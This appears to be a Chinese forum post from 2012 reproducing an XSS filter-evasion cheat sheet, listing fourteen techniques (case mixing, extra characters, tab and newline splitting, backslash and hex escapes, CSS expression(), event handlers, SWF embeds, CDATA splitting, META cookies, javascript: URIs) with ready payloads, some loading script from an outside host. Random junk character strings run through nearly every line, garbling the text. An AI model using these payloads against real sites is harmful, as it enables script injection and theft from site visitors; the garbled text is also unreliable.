1. 改变字符大小写) @' R& U: q1 J" m6 o# Q
: Q Z; e. C4 w/ _( c & u; t+ e+ u5 e" T8 U% F M; Y- M3 Y
! @4 Z! d" N& ]8 q* b
<sCript>alert(‘d’)</scRipT>+ P* @6 |, V6 ]! t7 U8 M: h
) I+ |! x5 K0 ^ ]& w2. 利用多加一些其它字符来规避Regular Expression的检查# g9 X/ J) [+ m5 M- G: s5 r: z+ C
$ y) a, ?, y v5 ^7 S# r7 u <<script>alert(‘c’)//<</script>
. p+ G$ Q" F) c! ^0 f) ?; n0 w f/ Z! b* A$ q
<SCRIPT a=">" SRC="t.js"></SCRIPT>
/ L( j9 ^, H" Y4 a1 L! i( C1 c7 O# A8 Q; k6 G3 F$ _) Y
<SCRIPT =">" SRC="t.js"></SCRIPT>
2 L+ C |3 q: S, R7 Y, w3 F& F2 @2 ?. f6 m( |3 L
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
( O8 P- s4 K/ _, w X: H$ x v0 n' s7 j2 z! S/ P8 P8 L) T6 R. F" s+ D
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
' t* a# ?3 O- M. q Q+ }
; N2 h5 e ]4 l) h2 x2 [3 e <SCRIPT a=`>` SRC="t.js"></SCRIPT>) W) \, k& Q' q4 w' G# X" ~+ [8 B2 @
! H9 e% a f% ^# ? U
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>2 x6 H9 h; @6 @; M9 ] {
6 q# y8 F* b" S1 X3 v7 W6 O4 C3. 以其它扩展名取代.js
( B; \% E8 q- y R, }. r
( w% J" J6 G/ n( x <script src="bad.jpg"></script>1 l- B' w8 a5 u
+ ]$ i$ o' Q+ f& [. x. K0 y8 T% m
4. 将Javascript写在CSS档里1 k' ]7 C6 p; m6 c$ ?" f: y
; e5 y2 z6 B# a' Q
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">- z$ p. n/ P9 D% O
" S# N9 }/ V# @ example:
1 v E K- f3 l' }& @" @7 V- E8 | R7 X( M/ m* U
body {
. q4 h, i- j6 v4 W2 m
! P+ n& G& N, p, b( E- H6 l background-image: url(‘javascript:alert("XSS");’)
6 x0 T3 C- b8 W
+ M( j) n. [& @& H4 o }- X C! B; m9 p; n& |1 o' x* F
( ?$ P; D# X. g# {/ Q5. 在script的tag里加入一些其它字符4 E9 h2 X0 p- k6 A* R+ u# M( `
& `( ]( ~9 R# L* J
<SCRIPT/SRC="t.js"></SCRIPT>$ C9 i* m. u7 |5 `
3 c0 N/ r. ?" j <SCRIPT/anyword SRC="t.js"></SCRIPT>
: }7 q7 R+ Y9 {5 J' Y) C+ J. Z$ X8 D9 T) X
6. 使用tab或是new line来规避8 e0 l- k( r, D4 L# I/ N
* S' ]( t ]+ [! Y7 @1 r# X7 c/ h <img src="jav ascr ipt:alert(‘XSS3′)">
* B/ C5 x/ U0 l7 R& b, W$ u: s1 w x6 P4 {
<img src="jav ascr ipt:alert(‘XSS3′)">
6 t: L% m$ Y3 t0 x" b& \& {, l; m$ w, h# O( r) }
<IMG SRC="jav ascript:alert(‘XSS’);">
1 J5 a8 @# k& W6 {4 K/ ]4 a) y% p8 I/ z1 _% U1 z2 a$ x& L
-> tag
) D+ t; N6 S5 G5 k/ o2 k# u3 W
* C. Z; @7 E$ c -> new line& y* |3 k* Y8 x+ T, T" z, l5 r
8 E I# X8 ] E" Y) d8 m7. 使用"\"来规避
! z$ C* N; B, t& X* r" {' _7 g8 Y5 t) t6 B; ]1 t4 O- p0 W
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
, Q p2 {. V _2 Q- m. S0 H& N, O. ^+ B/ h
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>% i2 E: n+ s9 `6 ^( R: } S
7 @' U7 }# o7 u
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
; A& f, z" Z0 T7 w0 \: A+ G/ I' E! @; P! M/ Z9 `, o7 c- W
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
8 V9 S1 H x6 N9 A0 }4 K0 O V) R+ x9 M7 y4 e, I
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>8 `, i7 ~. Q' E- X* J
. i" E {, t* k3 h, n7 i2 Q K* b
8. 使用Hex encode来规避(也可能会把";"拿掉)+ O4 }: R8 v0 [; ]
# I" I/ a" K0 [4 \% [$ z; r+ h
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">9 h& T7 `- C! { `+ O( M8 g6 b6 I
" }4 L# l$ M/ o& ? 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
H1 l2 r5 {$ N* }) F4 u8 Y. u& I5 z$ ^3 J& V
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
3 Q6 @7 m% l" F: s
$ z! I$ A) M& S5 a 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
7 P Y& [$ p6 r6 ^) T+ C7 Z2 `7 `! b% f
9. script in HTML tag
, t1 {- r- I. q' k B% J7 z4 [ P: w7 C. t
<body onload=」alert(‘onload’)」>
1 n3 |* \1 J: r3 x& l8 _: \4 ~$ e$ O t: U5 a4 t
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload: ~0 k/ M6 k1 [0 I ]
7 ^; M5 w1 p5 T* C7 ^" |. \, F' R0 `10. 在swf里含有xss的code! t$ I1 X" x M) g
4 Y$ R$ m% \$ ?2 f- r <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>7 n5 d) o$ x" |" `. c/ X3 g
5 \) D3 y" f9 A6 o
11. 利用CDATA将xss的code拆开,再组合起来。/ a1 w" `, G. y6 z6 z! u) O
" Q* r! ]/ i# N <XML ID=I><X><C>
2 ~9 l* n" x9 e) U& U* z$ S- A$ i: m" K2 g. o9 B5 ]7 I
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
) d& i9 J# w2 D" S! V
) D( M' V; N0 {0 A: B </C></X>( Q+ F, ~3 W- q7 V2 D
9 s; N2 {( U% i8 o </xml>
) v, }( e: @ L$ H0 s* h7 e8 e Z5 C' {) n0 ^
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>0 D3 B& p( _' j" u
2 q8 i: h9 _4 [% X
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>4 i- {) \. s' ^4 ]" v& P
" R) F$ Q( c# z$ S+ A m4 @2 j
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>& o/ o( w$ m, o% W
9 O% J9 Y+ [) K$ h1 }. Y. B+ Q+ a
12. 利用HTML+TIME。
6 r2 \; k8 P: E" d' j. P0 b* C! ~( V y5 A/ y. [
<HTML><BODY>
3 P6 D5 _3 x! G- b' A. g) x$ f b6 v! L
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">3 s* |9 R& U# P/ q
6 f" s" e* O! S* L5 O <?import namespace="t" implementation="#default#time2">
+ d2 }7 _' {: y8 F
& T4 S) G" C5 l' ~ <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
% G) S& V1 x1 A- P6 O: _3 U( k C5 q0 F
</BODY></HTML>
4 {9 T* \ v3 C" y0 d. E
1 B1 X* v. W; d13. 透过META写入Cookie。
' V& {6 E" R. f% |2 o, r0 h, m# r; M$ Y% p7 r$ m; M5 T
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
5 F/ ^5 Y7 O0 w$ H. i& x
1 F- i0 W9 j4 f& o& X% ^14. javascript in src , href , url
3 E5 v, q# Z) S" c8 J4 C* G
2 o1 \( X0 W- f- D5 q <IFRAME SRC=javascript:alert(’13′)></IFRAME>
: M6 n% g: m' n1 P1 e# ~5 V8 M+ K" W z2 }: J. p
<img src="javascript:alert(‘XSS3′)">* n4 |6 x" K9 Q- }- [
3 I8 v U1 _+ Z* K) j) a/ R; ]<IMG DYNSRC="javascript:alert(‘XSS20′)">
4 z8 E0 f- x1 Z1 O+ r
# X, R4 k2 g, C+ e <IMG LOWSRC="javascript:alert(‘XSS21′)">
, ?9 {7 h, i1 W3 P% \- Z' h/ X6 K' a5 ~- j
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
' m3 n% }( |1 y a' C) S' \: ~; P
7 n" i% t% d# N' N <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
- |" h3 G$ f" e$ j! y" R! l, \7 a; {& y3 ]
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">; n, l% T0 s; ]( w" b
; H" j/ F! I T6 d. A9 I1 X <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">- z/ K8 s8 N, x3 O. Z, f7 o
/ T+ m- X- N# k/ }
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}8 ?1 w) f P% w8 i0 @
: v6 j7 Z/ w2 h3 e
</STYLE><A CLASS=XSS></A>& W6 m" j6 K+ v3 O* j6 R
" z* a8 Z5 {) C- H: N) }7 ^ <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
1 I$ H9 h8 T& H- j; m& F# G% k& |' N ]; L; d- O, o
|
发表于 2012-12-31 09:59:28
收藏
支持
反对